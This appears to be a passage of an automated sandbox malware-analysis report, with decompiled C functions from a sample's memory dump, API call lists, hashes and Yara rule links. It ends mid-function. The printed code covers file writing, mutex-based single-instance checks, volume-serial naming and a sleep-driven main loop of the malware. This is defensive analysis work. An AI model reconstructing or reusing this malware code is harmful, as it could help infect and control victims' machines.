				void* _v8;
				signed int _v12;
				int _t15;
				void* _t17;
				intOrPtr _t18;
				void* _t20;
				intOrPtr _t21;
				void* _t25;

				_v8 = _v8 & 0x00000000;
				_t15 = OpenProcessToken(_a4, 8,  &_v8);
				if(_t15 != 0) {
					_v12 = _v12 & 0x00000000;
					_t17 = E00ECE716(_v8, 1,  &_v12); // executed
					_t25 = _t17;
					if(_t25 != 0) {
						_t18 =  *0xef56c8; // 0x520f6c8
						 *((intOrPtr*)(_t18 + 0x30))(_v8);
						_t20 = _t25;
					} else {
						if(_v8 != _t17) {
							_t21 =  *0xef56c8; // 0x520f6c8
							 *((intOrPtr*)(_t21 + 0x30))(_v8);
						}
						_t20 = 0;
					}
					return _t20;
				} else {
					return _t15;
				}
			}

0x00ece39c
0x00ece3a9
0x00ece3b1
0x00ece3b5
0x00ece3c3
0x00ece3c8
0x00ece3cf
0x00ece3e8
0x00ece3ed
0x00ece3f0
0x00ece3d1
0x00ece3d4
0x00ece3d9
0x00ece3de
0x00ece3de
0x00ece3e1
0x00ece3e1
0x00ece3f4
0x00ece3b4
0x00ece3b4
0x00ece3b4

APIs

OpenProcessToken.ADVAPI32(?,00000008,00000000,?,?,?,00ECF066,00000000), ref: 00ECE3A9

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: OpenProcessToken
String ID:
API String ID: 4190504469-0
Opcode ID: 83f3f50026069136f1b02ee497c86aff50ee6b0ae0b39aad35c08926f0fa213a
Instruction ID: 78305968fa58a8b6c3e9dd2448f355424f08768493d41561b0ae0b8ed28aa243
Opcode Fuzzy Hash: 83f3f50026069136f1b02ee497c86aff50ee6b0ae0b39aad35c08926f0fa213a
Instruction Fuzzy Hash: 4EF06432A10208FFDF208B95CE49FAD77B8EB0435AF1100A4F901F7260E672AE45DA60

Uniqueness

Uniqueness Score: -1.00%

Function 00ECD1EA, Relevance: 1.5, APIs: 1, Instructions: 33
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00ECD1EA(char _a4, intOrPtr _a8) {
				char _t3;
				intOrPtr _t4;
				void* _t9;

				_t3 = _a4;
				if(_t3 == 0) {
					return _t3;
				}
				_t9 =  *_t3;
				if(_t9 != 0) {
					 *_t3 =  *_t3 & 0x00000000;
					_t4 = _a8;
					if(_t4 != 0xffffffff) {
						if(_t4 == 0xfffffffe) {
							_t4 = E00ECFF99(_t9);
						}
					} else {
						_t4 = E00ECFE78(_t9);
					}
					E00ECD1CB(_t9, 0, _t4);
					_t3 = RtlFreeHeap( *0xef5744, 0, _t9); // executed
				}
				return _t3;
			}

0x00ecd1ed
0x00ecd1f2
0x00ecd238
0x00ecd238
0x00ecd1f5
0x00ecd1f9
0x00ecd1fb
0x00ecd1fe
0x00ecd204
0x00ecd212
0x00ecd216
0x00ecd216
0x00ecd206
0x00ecd207
0x00ecd20c
0x00ecd21f
0x00ecd230
0x00ecd230
0x00000000

APIs

RtlFreeHeap.NTDLL(00000000,00000000,00000114), ref: 00ECD230

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 63968324f5e1b719d0515b1775655cd62b3207c7002b59d9fb848c6b7db576f4
Instruction ID: 459b1416a26f04c81c716fc6429f6b9f574524835e8565870273ab2001e48d4b
Opcode Fuzzy Hash: 63968324f5e1b719d0515b1775655cd62b3207c7002b59d9fb848c6b7db576f4
Instruction Fuzzy Hash: 8EF082316455145BCA2426249E41FBA379D9F12B34F241229F514BA1F0C733DD0245D1

Uniqueness

Uniqueness Score: -1.00%

Function 00ED3279, Relevance: 1.5, APIs: 1, Instructions: 32
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00ED3279(WCHAR* _a4, long _a8) {
				intOrPtr _t9;
				void* _t12;

				_t12 = CreateFileW(_a4, 0x40000000, 0, 0, _a8, 0x80, 0);
				if(_t12 != 0xffffffff) {
					if(_a8 == 4) {
						_t9 =  *0xef56c8; // 0x520f6c8
						 *((intOrPtr*)(_t9 + 0x80))(_t12, 0, 0, 2);
					}
					return _t12;
				}
				return 0;
			}

0x00ed329b
0x00ed32a0
0x00ed32aa
0x00ed32ac
0x00ed32b6
0x00ed32b6
0x00000000
0x00ed32bc
0x00000000

APIs

CreateFileW.KERNELBASE(00000080,40000000,00000000,00000000,?,00000080,00000000,00000000,00000200,?,00ED32F9,00000080,00000002,00000200,?,00ED0A21), ref: 00ED3298

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b77146844bd5ab4677eddaf9714b55a3b48ef354d044553861b2c35cf63bca17
Instruction ID: 90a0bdb801918646d65a65df5e5f5e08971da3639ac56f1e4402478888a1c2e0
Opcode Fuzzy Hash: b77146844bd5ab4677eddaf9714b55a3b48ef354d044553861b2c35cf63bca17
Instruction Fuzzy Hash: 9BF0C036601124BBC7305A67AC0CFD73F9DEB867B5F014221FA29D62B0C6309945DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00ED3233, Relevance: 1.5, APIs: 1, Instructions: 32
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00ED3233(void* __ecx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				long _v8;
				void* _t12;
				void* _t22;

				_t22 = 0;
				if(_a12 == 0) {
					L3:
					_t12 = 1;
				} else {
					while(1) {
						_v8 = _v8 & 0x00000000;
						if(WriteFile(_a4, _a8 + _t22, _a12 - _t22,  &_v8, 0) == 0) {
							break;
						}
						_t22 = _t22 + _v8;
						if(_t22 < _a12) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					_t12 = 0;
				}
				L4:
				return _t12;
			}

0x00ed3238
0x00ed323d
0x00ed326f
0x00ed3271
0x00ed323f
0x00ed323f
0x00ed323f
0x00ed3265
0x00000000
0x00000000
0x00ed3267
0x00ed326d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00ed326d
0x00ed3275
0x00ed3275
0x00ed3272
0x00ed3274

APIs

WriteFile.KERNELBASE(00000080,?,00000200,00000000,00000000,00000000,00000002,?,00ED3312,00000000,?,00000200,00000200,?,00ED0A21), ref: 00ED325D

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 312ace6debeab08a5037e1751d374af519ac7ae29b62b78057b49625f30e9581
Instruction ID: 7646a2e8706ee6a64325ea362a78194a7aece95ff577c26671b8128a53ac0154
Opcode Fuzzy Hash: 312ace6debeab08a5037e1751d374af519ac7ae29b62b78057b49625f30e9581
Instruction Fuzzy Hash: 4AF0F872A10229BFDF10DE69CC45BAAB7ACFB04755F150465B819E3250D770EE01DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00ECEF97, Relevance: 1.5, APIs: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00ECEF97(intOrPtr _a4) {
				intOrPtr _t5;
				intOrPtr _t7;
				void* _t13;
				void* _t15;

				_t5 =  *0xef56c8; // 0x520f6c8
				_t13 = 0;
				_t15 =  *((intOrPtr*)(_t5 + 0xbc))(2, 0, _a4);
				if(_t15 != 0) {
					_t7 =  *0xef56c8; // 0x520f6c8
					_push(_t15);
					if( *((intOrPtr*)(_t7 + 0xc0))() != 0) {
						_t13 = 1;
					}
					FindCloseChangeNotification(_t15);
					return _t13;
				}
				return 0;
			}

0x00ecef9a
0x00ecefa4
0x00ecefaf
0x00ecefb3
0x00ecefbb
0x00ecefc0
0x00ecefc9
0x00ecefda
0x00ecefda
0x00ecefd1
0x00000000
0x00ecefd4
0x00000000

APIs

FindCloseChangeNotification.KERNELBASE(00000000,?,00EC21CA,?,00000000,00EF56E8), ref: 00ECEFD1

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: d850d74d0678eaa8ed8a6dfd93744d4c087f17d3787c62c3cbdc1202e9816abc
Instruction ID: 906ab1dc999ca83c4c6e6eb03fffe643db996f4a5760966e856df24a42b12756
Opcode Fuzzy Hash: d850d74d0678eaa8ed8a6dfd93744d4c087f17d3787c62c3cbdc1202e9816abc
Instruction Fuzzy Hash: 10F0E5363016509FD3219B669C0CFEB7B98EBC5351F431078F619E7320D2208842CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00ED32EB, Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00ED32EB(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _t5;
				void* _t6;
				void* _t10;
				void* _t13;
				void* _t14;

				_t5 = E00ED3279(_a4, 2); // executed
				_t14 = _t5;
				_pop(_t13);
				if(_t14 != 0) {
					_t6 = E00ED3233(_t13, _t14, _a8, _a12); // executed
					if(_t6 != 0) {
						FindCloseChangeNotification(_t14);
						return 0;
					}
					_t10 = 0xfffffffe;
					return _t10;
				}
				return _t5 | 0xffffffff;
			}

0x00ed32f4
0x00ed32f9
0x00ed32fc
0x00ed32ff
0x00ed330d
0x00ed3317
0x00ed3324
0x00000000
0x00ed3327
0x00ed331b
0x00000000
0x00ed331b
0x00000000

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 865ba26e4fd867532cebfa6e557589c83efe9b6bf7b9c235f649be6fe81f7acc
Instruction ID: 0d9d2dde5e1e40de2b6984e2b8b63a75a139d2456c41750056cf98a252d70660
Opcode Fuzzy Hash: 865ba26e4fd867532cebfa6e557589c83efe9b6bf7b9c235f649be6fe81f7acc
Instruction Fuzzy Hash: 57E0D837908614BBCB211AB6AE05D9A3B88EF053B4B511313F935F92F1DF218B2247C2

Uniqueness

Uniqueness Score: -1.00%

Function 00EC9E09, Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EC9E09(void* __ecx, void* __eflags) {
				char _v44;
				char _v556;
				void* __ebx;
				void* __esi;
				void* _t5;
				intOrPtr _t9;
				void* _t18;
				intOrPtr _t19;

				_t18 = __eflags;
				_t5 = E00ED21E2( &_v556, __ecx, 0xee3be0); // executed
				E00ECEE1F( &_v44, _t18, _t5 + 1);
				_t9 = E00ED341E( &_v44, 0x64); // executed
				 *0xef5738 = _t9; // executed
				IsValidCodePage(0x27); // executed
				_t19 =  *0xef5738; // 0x0
				return 0 | _t19 != 0x00000000;
			}

0x00ec9e09
0x00ec9e1f
0x00ec9e29
0x00ec9e33
0x00ec9e3d
0x00ec9e42
0x00ec9e4a
0x00ec9e56

APIs

Part of subcall function 00ED21E2: memset.MSVCRT ref: 00ED21FA
Part of subcall function 00ED21E2: lstrcpynW.KERNEL32(?,?,00000100,?,00000000,00000228), ref: 00ED2224
Part of subcall function 00ED21E2: GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000105,00000000,00000000,?,00000100,?,00000000,00000228), ref: 00ED2254
Part of subcall function 00ED21E2: lstrcatW.KERNEL32(?,?), ref: 00ED228C
Part of subcall function 00ED21E2: CharUpperBuffW.USER32(?,00000000,?,00000000,00000228), ref: 00ED229E

Part of subcall function 00ED341E: CreateMutexA.KERNELBASE(00000000,00000001,00000000,?,?,00EC9E38,?,00000064,00000001,00EE3BE0,00000000,00000000), ref: 00ED342E
Part of subcall function 00ED341E: GetLastError.KERNEL32(?,00EC9E38,?,00000064,00000001,00EE3BE0,00000000,00000000), ref: 00ED343A

IsValidCodePage.KERNELBASE(00000027,?,?,00000000,00000000), ref: 00EC9E42

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: BuffCharCodeCreateErrorInformationLastMutexPageUpperValidVolumelstrcatlstrcpynmemset
String ID:
API String ID: 1961199877-0
Opcode ID: 796bde5c42ed4fe1e85829a163ca97fdb97dbc8e982ccb7bfa22a9c88c6b6f73
Instruction ID: cb45a30cc42fa32b6e1c7f2f28c93fcd927128547f5582323cfea402311bfe97
Opcode Fuzzy Hash: 796bde5c42ed4fe1e85829a163ca97fdb97dbc8e982ccb7bfa22a9c88c6b6f73
Instruction Fuzzy Hash: 26E0D832A01318AFD70077B6AC8F99A76ECDB14360F012462B206BB1D1E5769D95C590

Uniqueness

Uniqueness Score: -1.00%

Function 00EC583E, Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EC583E(void* __edx, void* __eflags, void* __fp0, intOrPtr _a4) {
				void* __esi;

				E00EC4B04(__edx, __eflags, __fp0); // executed
				E00ECEA28(_a4, _a4 + 4);
				Arc(0, 0x39, 0x2e, 0x56, 0x1a, 0x20, 0x43, 0x26, 0x34);
				return 0;
			}

0x00ec5842
0x00ec584e
0x00ec5866
0x00ec5870

APIs

Part of subcall function 00EC4B04: CreateEnhMetaFileA.GDI32(00000000,SL B lE0PNbSEfCx9nxI 2zcUI4LQFnx, IoPVMqNv987sx7K9AhTXQwcP1w9GxR CNk7vxWOPSr.81YDhu6lK0WzKAXMP4 0jArFA oAoXzds3rwvFY6oG4cbmiAFx4WAVC2biL.HeTrPlLazpq,B MayDlk7oF5Q76B45zbIiIfxeUrYCmwUPdc553iE 3Uk016bby9tzIJ.53U8YgcyIV0BAYmnGtVVy7MLd2T Zj,9YXs0hcv1E3QZ95gvo 9yO,00000000,00000000), ref: 00EC4B79
Part of subcall function 00EC4B04: ArcTo.GDI32(00000000,0000001A,00000052,0000000D,00000045,0000003B,00000043,00000041,00000038), ref: 00EC4B90

Arc.GDI32(00000000,00000039,0000002E,00000056,0000001A,00000020,00000043,00000026,00000034), ref: 00EC5866

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: CreateFileMeta
String ID:
API String ID: 2005549212-0
Opcode ID: e858e1398ffec1a74c6cfea6bec4c27923326878702ee85211f88b656c321628
Instruction ID: 93c4462e622f1e1c8e071baef36b8e4373971f0862c63811bdacd1ba5bec30a7
Opcode Fuzzy Hash: e858e1398ffec1a74c6cfea6bec4c27923326878702ee85211f88b656c321628
Instruction Fuzzy Hash: 96E012717C030C7AF535AA90ED0BF86738CDB18F91F401415F3047E0C1D5E5BA418699

Uniqueness

Uniqueness Score: -1.00%

Function 00ED0DEE, Relevance: 1.5, APIs: 1, Instructions: 19
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00ED0DEE() {
				signed int _t3;

				_t3 = CreateMutexA(0, 0, 0);
				 *0xef57b0 = _t3;
				if(_t3 != 0) {
					_t3 = E00ECD239(0x1000);
					 *0xef5754 = _t3;
					if(_t3 == 0) {
						goto L1;
					} else {
						 *0xef5750 =  *0xef5750 & 0x00000000;
						return 0;
					}
				} else {
					L1:
					return _t3 | 0xffffffff;
				}
			}

0x00ed0df9
0x00ed0dff
0x00ed0e06
0x00ed0e11
0x00ed0e17
0x00ed0e1e
0x00000000
0x00ed0e20
0x00ed0e20
0x00ed0e29
0x00ed0e29
0x00ed0e08
0x00ed0e08
0x00ed0e0b
0x00ed0e0b

APIs

CreateMutexA.KERNELBASE(00000000,00000000,00000000,00EC45D0), ref: 00ED0DF9

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 756f45a130cf6bff174e0b9ae573732743aa2e8928b85ea71e8fd2624f991098
Instruction ID: f90f91db735e4e5b345af9ed377d375022bac731fa2fa017430386da494e8dd3
Opcode Fuzzy Hash: 756f45a130cf6bff174e0b9ae573732743aa2e8928b85ea71e8fd2624f991098
Instruction Fuzzy Hash: 45E0C232204B019EE7105B36AC09B2037D0E750312F440227F614E92E0EFB0D008C610

Uniqueness

Uniqueness Score: -1.00%

Function 00ED32C2, Relevance: 1.5, APIs: 1, Instructions: 19
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00ED32C2(WCHAR* _a4) {
				signed int _t6;

				_t6 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0, 0);
				_t3 = _t6 + 1; // 0x1
				asm("sbb eax, eax");
				return  ~_t3 & _t6;
			}

0x00ed32db
0x00ed32e0
0x00ed32e5
0x00ed32ea

APIs

CreateFileW.KERNELBASE(00EC9569,80000000,00000001,00000000,00000003,00000000,00000000,?,00ED339F,00EC9569,00000000,00000000,0CC48300,?,?,00EC98F4), ref: 00ED32DB

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: df019f022c3bd36d22e85dbba65828312da31ffd168c82874830bd299cc41d19
Instruction ID: f0fea8c1fd01ea56b5d73d65460a40d5ce3108f419de97ef51e77651a6546c0b
Opcode Fuzzy Hash: df019f022c3bd36d22e85dbba65828312da31ffd168c82874830bd299cc41d19
Instruction Fuzzy Hash: 1AD0A9323A8208BFEB108E74DC02FB237DDD700600F104228BA09EA1A0E662E9408A50

Uniqueness

Uniqueness Score: -1.00%

Function 00ED0B5E, Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00ED0B5E(WCHAR* _a4) {

				return 0 | GetFileAttributesW(_a4) != 0xffffffff;
			}

0x00ed0b77

APIs

GetFileAttributesW.KERNELBASE(?,?,00EC4430,?,?,00EC4342,00EC9A80,?,?,00EE1614,?,00EE1614,?,00EE1614,?,00000000), ref: 00ED0B69

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: ba1789395c1cdf4bf3d6980333885b901c55a80536d5734adac87be9e0e81c27
Instruction ID: d8fcaa36de6cb67a91b57030ff80153059b2faf5f2d2b1c14ca62a82177e904b
Opcode Fuzzy Hash: ba1789395c1cdf4bf3d6980333885b901c55a80536d5734adac87be9e0e81c27
Instruction Fuzzy Hash: 6FC08C3A2142085FCB041B39EC4585C3B989B082303420224F439C62F0E622E8908E40

Uniqueness

Uniqueness Score: -1.00%

Function 00ECD239, Relevance: 1.5, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00ECD239(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0xef5744, 8, _a4); // executed
				return _t2;
			}

0x00ecd247
0x00ecd24e

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,00ECE8D2,00000100,?,00EC33EA), ref: 00ECD247

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4f3c736e9e298e7ea0c2486149e2c494fa8bb5119bc93eb58a2026827fd7aceb
Instruction ID: 25818d38ef138d5c78d48184dd1d83f34a09f107866cb164594507f9127ce3d6
Opcode Fuzzy Hash: 4f3c736e9e298e7ea0c2486149e2c494fa8bb5119bc93eb58a2026827fd7aceb
Instruction Fuzzy Hash: 59B09232080A0CFFCB412B83EC46BA43F2AF754651F008011F608290B08AA26568EB80

Uniqueness

Uniqueness Score: -1.00%

Function 00EC9DCA, Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EC9DCA() {
				int _t3;

				_t3 = FindCloseChangeNotification( *0xef5738);
				if(_t3 != 0) {
					 *0xef5738 =  *0xef5738 & 0x00000000;
					return _t3;
				}
				return _t3;
			}

0x00ec9dd5
0x00ec9dda
0x00ec9ddc
0x00000000
0x00ec9ddc
0x00ec9de3

APIs

FindCloseChangeNotification.KERNELBASE(00EC9BAA), ref: 00EC9DD5

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 86d3418062106f284f0410ff603323a493237b2d03c8a883247e2fba6887a9ce
Instruction ID: 0d947f641ba0b752b0fea0d4cbdbd80832cc3aae94d147940d600cceb935b844
Opcode Fuzzy Hash: 86d3418062106f284f0410ff603323a493237b2d03c8a883247e2fba6887a9ce
Instruction Fuzzy Hash: C6C04C36212600CFD7115B12DD48B3077A4F7A0726F8220559501A25B1C7368459CE10

Uniqueness

Uniqueness Score: -1.00%

Function 00ECD162, Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00ECD162() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0xef5744 = _t1;
				return _t1;
			}

0x00ecd16b
0x00ecd171
0x00ecd176

APIs

HeapCreate.KERNELBASE(00000000,00080000,00000000,00EC33C5), ref: 00ECD16B

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: e17582b2b8855973ccdcbeb4f6ea1926ec7be5a2aa9987369871a696206a05dd
Instruction ID: b80f6b1b60e707049a5b913e58fa122ec9446cb048a79d2722dcf40d56d3b6eb
Opcode Fuzzy Hash: e17582b2b8855973ccdcbeb4f6ea1926ec7be5a2aa9987369871a696206a05dd
Instruction Fuzzy Hash: 7DB01270282B00DED3E06B125C46B103520A340B02F200001F3087D1D4C6E0104C9B08

Uniqueness

Uniqueness Score: -1.00%

Function 00ECF820, Relevance: 1.4, APIs: 1, Instructions: 103
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00ECF820(short __eax, WCHAR* _a4, intOrPtr _a8, short _a12) {
				char _v8;
				char _v12;
				WCHAR* _v16;
				void* __ebx;
				void* __esi;
				short _t31;
				intOrPtr _t38;
				char _t43;
				intOrPtr _t45;
				short _t49;
				short _t63;
				WCHAR* _t65;

				_t63 = 0;
				_t49 = __eax;
				_v12 = 0;
				_v8 = 0;
				_t65 = E00ECD239(0x448);
				_v16 = _t65;
				if(_t65 != 0) {
					_t65[0x21a] = _t49;
					_t65[0x21c] = _a12;
					lstrcpynW(_t65, _a4, 0x200);
					if(_t49 != 1) {
						_t31 = E00ECD239(0x100000);
						_t65[0x212] = _t31;
						if(_t31 != 0) {
							_t65[0x216] = 0x100000;
							if(_a8 == 0) {
								L18:
								return _t65;
							}
							E00ECF93B(_t65, _a8);
							L17:
							goto L18;
						}
						_t63 = 0;
						L8:
						if(_v8 != _t63) {
							E00ECD1EA( &_v8, _t63);
						}
						L10:
						if(_t65[0x218] != _t63) {
							_t38 =  *0xef56c8; // 0x520f6c8
							 *((intOrPtr*)(_t38 + 0x30))(_t65[0x218]);
						}
						_t66 =  &(_t65[0x212]);
						if(_t65[0x212] != _t63) {
							E00ECD1EA(_t66, _t63);
						}
						E00ECD1EA( &_v16, _t63);
						goto L1;
					}
					_t43 = E00ED337F(_a4,  &_v12); // executed
					_v8 = _t43;
					if(_t43 == 0) {
						goto L10;
					}
					if(E00ECFB44(_t65, _t43, _v12, _a8) < 0) {
						goto L8;
					}
					_t45 =  *0xef56c8; // 0x520f6c8
					 *((intOrPtr*)(_t45 + 0x30))(_t65[0x218]);
					_t65[0x218] = 0;
					E00ECD1EA( &_v8, 0);
					goto L17;
				}
				L1:
				return 0;
			}

0x00ecf829
0x00ecf830
0x00ecf832
0x00ecf835
0x00ecf83d
0x00ecf840
0x00ecf845
0x00ecf859
0x00ecf860
0x00ecf866
0x00ecf86f
0x00ecf8c2
0x00ecf8c8
0x00ecf8d0
0x00ecf923
0x00ecf929
0x00ecf934
0x00000000
0x00ecf934
0x00ecf92e
0x00ecf933
0x00000000
0x00ecf933
0x00ecf8d2
0x00ecf8d4
0x00ecf8d7
0x00ecf8de
0x00ecf8e4
0x00ecf8e5
0x00ecf8eb
0x00ecf8f3
0x00ecf8f8
0x00ecf8f8
0x00ecf8fb
0x00ecf903
0x00ecf907
0x00ecf90d
0x00ecf913
0x00000000
0x00ecf919
0x00ecf878
0x00ecf87f
0x00ecf884
0x00000000
0x00000000
0x00ecf899
0x00000000
0x00000000
0x00ecf8a1
0x00ecf8a6
0x00ecf8ae
0x00ecf8b4
0x00000000
0x00ecf8b9
0x00ecf847
0x00000000

APIs

Part of subcall function 00ECD239: RtlAllocateHeap.NTDLL(00000008,?,?,00ECE8D2,00000100,?,00EC33EA), ref: 00ECD247

lstrcpynW.KERNEL32(00000000,00000000,00000200,00000000,00000000,00000004,00EC94B5,?,00000000,00000000), ref: 00ECF866

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeaplstrcpyn
String ID:
API String ID: 680773602-0
Opcode ID: fd82146e047c31819eaef8a3c7d5514d0bb39dd05b2c5805a9ad54ba577ef680
Instruction ID: 620d1e9e827b98ff9b71f7000af31ec769779d1ca1a415a53be2d736a3c50906
Opcode Fuzzy Hash: fd82146e047c31819eaef8a3c7d5514d0bb39dd05b2c5805a9ad54ba577ef680
Instruction Fuzzy Hash: F131E172905204EFDB119FA5DE44F9EBBE9EB84324F20203EF518A6151EB329A42CB14

Uniqueness

Uniqueness Score: -1.00%

Function 00EC4531, Relevance: 1.3, APIs: 1, Instructions: 75
sleepCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00EC4531(void* __edx) {
				void* __edi;
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				intOrPtr _t9;
				intOrPtr _t11;
				intOrPtr _t13;
				void* _t27;
				void* _t28;
				void* _t29;
				void* _t31;

				_t30 = __edx;
				_t3 = E00ED1A5D(__edx, 0x3b); // executed
				_t27 = _t31;
				if(_t3 != 0xffffffff || E00EC4634() == 0) {
					E00ECE0AF(_t27, _t30, 0xef5770);
					_push( *0xef5774);
					_push( *0xef5770);
					_t28 = 0x37; // executed
					E00ED19A7(_t28);
					_t6 =  *0xef56a8; // 0xf00000
					_push(0);
					_push( *((intOrPtr*)(_t6 + 0x1640)));
					_t29 = 0x3a; // executed
					E00ED19A7(_t29); // executed
					 *0xef56a4 = E00ED050A(0xef2fe8, 0x54, 0xdf5); // executed
					_t9 = E00ED050A(0xef3040, 4, 0xbbc); // executed
					 *0xef56bc = _t9; // executed
					E00ED27AA(); // executed
					_t11 = E00EC4479(__eflags);
					__eflags = _t11;
					if(_t11 == 0) {
						goto L2;
					} else {
						E00ED0DEE(); // executed
						E00EC657E(_t29); // executed
						E00ED0F67(_t29, E00EC406F, 0, 0, 0); // executed
						E00EC2B0B(__eflags); // executed
						E00EC818C(_t30); // executed
						E00EC1075(_t30, 0); // executed
						while(1) {
							__eflags =  *0xef578c; // 0x0
							if(__eflags != 0) {
								break;
							}
							E00ECE0AF(_t29, _t30, 0xef56e8); // executed
							E00EC8491();
							Sleep(0xfa0);
						}
						E00EC211E();
						E00ED0E2A(_t29);
						E00EC2AB3();
						_t13 = 0;
						__eflags = 0;
					}
				} else {
					L2:
					_t13 = 1;
				}
				return _t13;
			}

0x00ec4531
0x00ec453b
0x00ec4540
0x00ec4544
0x00ec455c
0x00ec4561
0x00ec4567
0x00ec456f
0x00ec4570
0x00ec4575
0x00ec457c
0x00ec457d
0x00ec4585
0x00ec4586
0x00ec45ab
0x00ec45b0
0x00ec45b8
0x00ec45bd
0x00ec45c2
0x00ec45c7
0x00ec45c9
0x00000000
0x00ec45cb
0x00ec45cb
0x00ec45d0
0x00ec45dd
0x00ec45e5
0x00ec45ea
0x00ec45ef
0x00ec4615
0x00ec4615
0x00ec461b
0x00000000
0x00000000
0x00ec45fb
0x00ec4600
0x00ec460f
0x00ec460f
0x00ec461d
0x00ec4622
0x00ec4627
0x00ec462c
0x00ec462c
0x00ec462c
0x00ec454f
0x00ec454f
0x00ec4551
0x00ec4551
0x00ec4633

APIs

Sleep.KERNELBASE(00000FA0), ref: 00EC460F

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 32efbdf32deffffeed4bd6a05bd0fb9b15b5200cfdf1bc85573509b818809627
Instruction ID: a512701cff808ccf769150c52d7fcb760057711e22e5e54ca6629364d719d8e6
Opcode Fuzzy Hash: 32efbdf32deffffeed4bd6a05bd0fb9b15b5200cfdf1bc85573509b818809627
Instruction Fuzzy Hash: FC1102A2A40640AAD62037B26E07F6E36D4DBD1714F59316EB724B92C3DE234903C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 00ED19D1, Relevance: 1.3, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00ED19D1(void* __edx, intOrPtr* __esi, void* __fp0, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				char _v16;
